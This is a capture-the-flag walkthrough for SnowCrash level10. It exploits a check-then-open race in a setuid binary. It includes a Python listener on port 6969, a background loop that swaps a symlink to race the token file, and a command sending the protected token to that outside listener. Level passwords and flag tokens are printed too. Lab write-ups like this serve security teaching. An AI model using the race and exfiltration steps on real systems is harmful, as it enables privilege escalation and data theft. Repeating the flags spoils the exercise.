level09@SnowCrash:~$ su level10
Password: s5cAJpM8ev6XHw998pRWG728z

level10@SnowCrash:~$ ls -l
-rwsr-sr-x+ 1 flag10 level10 10817 Mar  5  2016 level10
-rw-------  1 flag10 flag10     26 Mar  5  2016 token

level10@SnowCrash:~$ strings level10
…
Connecting to %s:6969 ..
…

********************************************************************************
With gdb we disassemble main and we see that the program calls access and open.
On the man page of access we can read :
       Warning: Using these calls to check if a user is authorised to,
       for example, open a file before actually doing so using open(2)
       creates a security hole, because the user might exploit the short
       time interval between checking and opening the file to manipulate it.

So we will do just that to access token.

But we have to first write a little program to create a server on port 6969 to get the content of token.
Level to do inside the vm without ssh connection. In NAT.
********************************************************************************

import socket

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
addr = ("ip mac", 6969)
server.bind(addr)
server.listen(5)
print("addr = %s, port = %s" % addr)
while True:
    print("En attente...")
    (client, adressClient) = server.accept()
    print('Connexion de ', adressClient)
    while True:
        data = client.recv(1024)
        print('recu: "%s"' % data)
        if len(data) < 1:
            client.close()
            break
    break

********************************************************************************
We create a file toto that will have read permission.
********************************************************************************

level10@SnowCrash:~$ touch /tmp/toto
level10@SnowCrash:~$ chmod +r /tmp/toto

********************************************************************************
Then we will create a symbolic link on /tmp/toto and on the token successively
in a loop, so we can access /tmp/toto but open token when we pass the symbolic
link to level10. 
********************************************************************************

level10@SnowCrash:~$ $(while true; do ln -sf /tmp/toto /tmp/falsegod; ln -sf /home/user/level10/token /tmp/falsegod; done)&

********************************************************************************
The & permit us to keep this process in the background.
********************************************************************************

level10@SnowCrash:~$ ./level10 /tmp/falsegod [ip]
Connecting to [ip mac]:6969 .. Connected!
Sending file .. wrote file!

➜  42Projects python3 httpserver.py
addr = [ip mac], port = 6969
En attente...
Connexion de  (‘[ip mac]’, 52971)
recu: "b'.*( )*.\n'"
recu: "b'woupa2yuojeeaaed06riuj63c\n'"
recu: "b''"

********************************************************************************
This password works also for su flag11 !!
********************************************************************************

level10@SnowCrash:~$ su flag10
Password: woupa2yuojeeaaed06riuj63c
Don't forget to launch getflag !
flag10@SnowCrash:~$ getflag
Check flag.Here is your token : feulo4b72j7edeahuete3no7c

flag10@SnowCrash:~$ su flag11
Password: woupa2yuojeeaaed06riuj63c
Don't forget to launch getflag !
flag11@SnowCrash:~$ getflag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
